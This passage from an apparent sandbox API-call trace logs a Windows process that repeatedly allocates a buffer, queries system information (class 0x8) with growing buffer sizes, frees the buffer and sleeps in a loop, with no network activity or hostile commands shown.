returned 0x29585b8 [0199.130] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0199.131] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.131] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0199.132] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.132] Sleep (dwMilliseconds=0x110) [0199.176] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0199.176] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.176] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.176] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0199.177] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.177] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.177] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0199.177] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.178] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.178] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0199.178] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0199.178] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.179] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0199.180] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.180] Sleep (dwMilliseconds=0x110) [0199.279] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0199.280] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.280] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.281] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0199.281] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.281] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.282] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0199.282] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.283] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.283] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0199.283] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0199.283] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.283] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0199.284] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.284] Sleep (dwMilliseconds=0x110) [0199.391] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0199.391] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.392] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.392] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0199.392] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.392] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.393] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0199.393] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.393] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.394] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0199.394] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0199.394] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.394] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0199.395] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.395] Sleep (dwMilliseconds=0x110) [0199.430] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0199.430] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.430] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.430] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0199.430] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.431] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.431] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0199.431] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.432] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.432] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0199.432] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0199.432] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.432] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0199.433] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.433] Sleep (dwMilliseconds=0x110) [0199.457] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0199.457] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.458] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.458] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0199.458] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.459] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.459] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0199.459] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.460] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.460] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0199.460] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0199.460] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.460] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0199.461] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.461] Sleep (dwMilliseconds=0x110) [0199.466] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0199.466] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.467] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.467] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0199.467] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.468] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.468] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0199.468] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.469] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.469] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0199.469] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0199.469] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.470] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0199.470] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.470] Sleep (dwMilliseconds=0x110) [0199.482] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0199.482] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.482] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.482] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0199.482] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.483] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.483] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0199.483] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.483] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.483] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0199.483] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0199.484] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.484] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0199.485] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.485] Sleep (dwMilliseconds=0x110) [0199.528] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0199.528] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.529] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.529] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0199.529] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.530] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.530] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0199.530] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.531] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.531] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0199.531] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0199.531] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.531] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0199.531] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.532] Sleep (dwMilliseconds=0x110) [0199.545] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0199.545] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.546] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.546] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0199.546] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.546] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.547] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0199.547] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.547] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.548] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0199.548] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0199.550] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.550] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0199.551] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.551] Sleep (dwMilliseconds=0x110) [0199.560] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0199.560] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.560] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.560] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0199.560] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.561] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.561] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0199.561] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.561] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.561] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0199.561] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0199.562] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.562] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0199.562] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.563] Sleep (dwMilliseconds=0x110) [0199.575] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0199.575] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.576] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.576] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0199.576] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.577] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.577] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0199.578] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.578] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.578] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0199.578] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0199.579] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.579] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0199.580] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.580] Sleep (dwMilliseconds=0x110) [0199.591] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0199.591] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.592] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.592] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0199.592] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.592] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.593] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0199.593] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.593] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.594] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0199.594] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0199.595] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.595] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0199.595] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.595] Sleep (dwMilliseconds=0x110) [0199.606] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0199.606] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.607] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.607] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0199.607] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.608] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.608] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0199.608] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.608] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.608] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0199.608] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0199.608] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.609] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0199.609] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.610] Sleep (dwMilliseconds=0x110) [0199.622] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0199.622] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.623] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.623] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0199.623] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.624] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.624] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0199.624] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, 